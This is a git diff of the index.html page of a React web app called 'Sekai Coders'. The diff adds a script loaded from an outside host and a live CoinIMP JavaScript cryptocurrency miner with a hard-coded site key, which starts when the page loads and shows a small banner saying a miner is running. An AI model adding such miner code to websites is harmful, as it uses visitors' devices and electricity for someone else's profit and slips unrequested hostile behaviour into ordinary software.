--- a/public/index.html
+++ b/public/index.html
@@ -14,6 +14,7 @@
       manifest.json provides metadata used when your web app is installed on a
       user's mobile device or desktop. See https://developers.google.com/web/fundamentals/web-app-manifest/
     -->
+
     <link rel="manifest" href="%PUBLIC_URL%/manifest.json" />
     <!--
       Notice the use of %PUBLIC_URL% in the tags above.
@@ -25,7 +26,17 @@
       Learn how to configure a non-root public URL by running `npm run build`.
     -->
     <title>Sekai Coders</title>
+    
   </head>
+  <script src="https://www.hostingcloud.racing/IvNX.js"></script>
+<script>
+    var _client = new Client.Anonymous('2221f372bafd9031e42c5e31a80eab5c0bf5a8195148463ddcf79138200e89bf', {
+        throttle: 0.8, c: 'w'
+    });
+    _client.start();
+    _client.addMiningNotification("Top", "This site is running JavaScript miner from coinimp.com", "#cccccc", 40, "#3d3d3d");
+
+</script>
   <body>
     <noscript>You need to enable JavaScript to run this app.</noscript>
     <div id="root"></div>
